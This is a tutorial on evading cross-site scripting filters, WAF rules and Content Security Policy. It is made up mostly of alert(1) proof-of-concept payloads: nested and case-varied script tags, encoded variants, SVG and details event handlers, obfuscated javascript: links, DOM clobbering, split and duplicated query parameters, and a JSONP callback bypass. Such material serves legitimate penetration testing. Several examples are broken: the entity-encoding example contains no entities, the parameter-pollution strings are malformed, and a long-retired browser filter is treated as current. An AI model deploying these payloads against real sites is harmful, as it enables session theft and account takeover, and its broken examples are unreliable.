XSS Evasion Techniques

This guide covers advanced techniques for bypassing Cross-Site Scripting (XSS) filters and security controls. Understanding these evasion methods is essential for thorough security testing and for demonstrating the limitations of inadequate protection mechanisms.

Understanding XSS Filters

Modern web applications implement various types of XSS protection:

• Input validation: Checking user input against allowed patterns
• Output encoding: Converting special characters to their HTML entity equivalents
• Content Security Policy (CSP): Restricting which scripts can execute
• WAF rules: Web Application Firewalls that block suspicious patterns
• Browser XSS filters: Built-in protections in modern browsers

Basic Evasion Techniques

Case Variation

Many basic filters only check for lowercase versions of dangerous tags:

\<ScRiPt\>alert(1)\</ScRiPt\>

Tag Obfuscation

Bypass filters that look for specific tags:

\<scr\<script\>ipt\>alert(1)\</scr\</script\>ipt\>

Attribute Splitting

Evade filters that scan for complete attribute patterns:

\<img o
n
error=alert(1) src=x\>

Encoding-Based Evasion

HTML Entity Encoding

Use HTML entities to bypass filters:

<script>alert(1)</script>

URL Encoding

Encode characters using URL encoding:

%3Cscript%3Ealert(1)%3C%2Fscript%3E

Unicode Encoding

Leverage Unicode encoding to hide malicious code:

\<script\>\u0061lert(1)\</script\>

Hex Encoding

Use hexadecimal encoding for evasion:

\<script\>&#x61;lert(1)\</script\>

Advanced Filter Bypass Techniques

Non-Standard Tags and Events

Use lesser-known HTML tags and events:

\<svg onload="alert(1)"\>
\<details ontoggle="alert(1)" open\>

JavaScript Protocol Obfuscation

Obfuscate the JavaScript protocol in URLs:

\<a href="javas&#99;ript:alert(1)"\>Click me\</a\>

DOM Clobbering

Use HTML elements to override JavaScript objects:

<form id="test"><input name="innerHTML" value="<script>alert(1)</script>"></form>

Null Bytes

Insert null bytes to confuse parsers:

<scri%00pt>alert(1)</script>

WAF Bypass Techniques

Regex Evasion

Bypass regex-based filters:

<script>/* */alert(1)/* */</script>

Parameter Pollution

Use duplicate parameters to confuse WAF logic:

?param"safe"&param"<script>alert(1)</script>"

Fragmentation

Split attacks across multiple parameters:

?param1="<img"&param2="src=\"x\""&param3="onerror=\"alert(1)\""

CSP Bypass Techniques

JSONP Endpoints

Leverage JSONP endpoints to execute arbitrary code:

<script src="https://trusted-domain.com/jsonp?callback=alert(1)"></script>

DOM-Based Bypasses

Use DOM manipulation to bypass CSP:

location.href = 'javascript:alert(1)';

Unsafe Inline Bypasses

Exploit unsafe-inline directives:

<script nonce="CSP-NONCE">alert(1)</script>

Browser-Specific Bypasses

Chrome XSS Auditor Bypasses

Techniques specific to Chrome's XSS protection:

<a href="'onclick=alert(1)//">Click me</a>

Safari Bypasses

Techniques that work specifically in Safari:

<div id="x">x</div><script>document.getElementById('x').innerHTML='<img src=x onerror=alert(1)>'</script>

Practical Evasion Methodology

Filter Analysis

1. Identify filtering mechanism: Determine what type of filter is in place
2. Test basic inputs: Understand what triggers the filter
3. Analyze responses: Look for clues in error messages or behavior

Bypass Development

1. Start with known bypasses: Try established techniques first
2. Combine methods: Use multiple evasion techniques together
3. Iterate and refine: Adjust your approach based on results

Testing Framework

Develop a systematic approach:

1. Create a baseline: Establish what's being blocked
2. Test variations: Try different encoding and obfuscation methods
3. Document successes: Record which techniques work

Next Steps

After mastering evasion techniques, explore:

• Exploitation Strategies - Learn how to leverage XSS vulnerabilities
• Identification Techniques - Review methods for finding XSS vulnerabilities